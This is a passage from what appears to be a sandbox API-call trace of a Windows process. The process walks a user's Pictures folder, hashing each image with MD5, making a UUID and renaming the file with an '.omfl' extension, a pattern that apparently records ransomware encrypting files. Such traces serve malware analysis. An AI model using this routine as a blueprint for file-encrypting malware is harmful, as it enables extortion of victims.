halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\1opjlqj72j8eofrzf.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\1OPjlQJ72J8EoFRZF.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\1opjlqj72j8eofrzf.jpg.omfl")) returned 1 [0134.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\4Mp7Xe3FRQyZ.jpg") returned=".jpg" [0134.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\4Mp7Xe3FRQyZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\4mp7xe3frqyz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.410] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=5867) returned 1 [0134.410] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.413] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.414] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.414] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.414] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.414] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.414] GetLastError () returned 0x0 [0134.414] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.414] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.414] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.414] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.414] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.415] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\4Mp7Xe3FRQyZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\4mp7xe3frqyz.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\4Mp7Xe3FRQyZ.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\4mp7xe3frqyz.jpg.omfl")) returned 1 [0134.417] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\GmkPni9tYsNq5wn.png") returned=".png" [0134.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\GmkPni9tYsNq5wn.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\gmkpni9tysnq5wn.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.417] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=37998) returned 1 [0134.417] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.420] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.422] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.422] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.422] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.422] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.422] GetLastError () returned 0x0 [0134.422] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.423] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.423] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.424] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.424] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.424] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.425] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\GmkPni9tYsNq5wn.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\gmkpni9tysnq5wn.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\GmkPni9tYsNq5wn.png.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\gmkpni9tysnq5wn.png.omfl")) returned 1 [0134.426] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\NAcl.png") returned=".png" [0134.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\NAcl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\nacl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.427] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=68964) returned 1 [0134.427] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.430] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.431] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.431] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.431] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.431] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.431] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.431] GetLastError () returned 0x0 [0134.431] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.432] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.432] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.432] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.432] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.432] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.433] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\NAcl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\nacl.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\NAcl.png.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\nacl.png.omfl")) returned 1 [0134.435] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\pbiqTrY.jpg") returned=".jpg" [0134.435] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\pbiqTrY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\pbiqtry.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.435] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=19230) returned 1 [0134.435] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.438] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.439] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.439] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.439] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.439] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.439] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.439] GetLastError () returned 0x0 [0134.439] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.440] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.440] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.440] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.440] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.440] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.440] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\pbiqTrY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\pbiqtry.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\pbiqTrY.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\pbiqtry.jpg.omfl")) returned 1 [0134.442] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\rCkH54Mf1pfHe67OJZeW.png") returned=".png" [0134.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\rCkH54Mf1pfHe67OJZeW.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\rckh54mf1pfhe67ojzew.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.442] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=74232) returned 1 [0134.442] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.446] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.447] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.447] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.447] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.447] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.447] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.447] GetLastError () returned 0x0 [0134.447] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.447] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.447] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.447] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.447] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.447] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.449] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\rCkH54Mf1pfHe67OJZeW.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\rckh54mf1pfhe67ojzew.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\rCkH54Mf1pfHe67OJZeW.png.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\rckh54mf1pfhe67ojzew.png.omfl")) returned 1 [0134.451] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\Rr2f42Vjk.jpg") returned=".jpg" [0134.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\Rr2f42Vjk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\rr2f42vjk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.451] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=85414) returned 1 [0134.451] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.455] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.456] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.456] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.456] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.456] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.456] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.456] GetLastError () returned 0x0 [0134.456] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.456] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.456] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.456] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.456] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.456] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.457] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\Rr2f42Vjk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\rr2f42vjk.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\Rr2f42Vjk.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\rr2f42vjk.jpg.omfl")) returned 1 [0134.459] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\wZF-ZD3OlP8rVb.gif") returned=".gif" [0134.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\wZF-ZD3OlP8rVb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\wzf-zd3olp8rvb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.459] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=62441) returned 1 [0134.460] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.463] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.464] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.464] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.464] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.464] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.464] GetLastError () returned 0x0 [0134.464] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.464] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.464] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.464] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.464] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.468] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\wZF-ZD3OlP8rVb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\wzf-zd3olp8rvb.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\wZF-ZD3OlP8rVb.gif.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\wzf-zd3olp8rvb.gif.omfl")) returned 1 [0134.471] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\_NTVCvoA39314yR.jpg") returned=".jpg" [0134.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\_NTVCvoA39314yR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\_ntvcvoa39314yr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.472] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=68489) returned 1 [0134.472] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.475] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.476] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.476] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.476] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.476] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.476] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.476] GetLastError () returned 0x0 [0134.477] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.477] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.477] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.477] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.477] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.477] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.479] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\_NTVCvoA39314yR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\_ntvcvoa39314yr.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\2-VviHUj4Jrbbiwm1-j\\_NTVCvoA39314yR.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\2-vvihuj4jrbbiwm1-j\\_ntvcvoa39314yr.jpg.omfl")) returned 1 [0134.480] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.480] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd148f0 [0134.480] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.480] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14ab8 [0134.480] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.480] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\") returned="nfvg7ITf\\" [0134.480] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.481] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0134.481] PathFindFileNameW 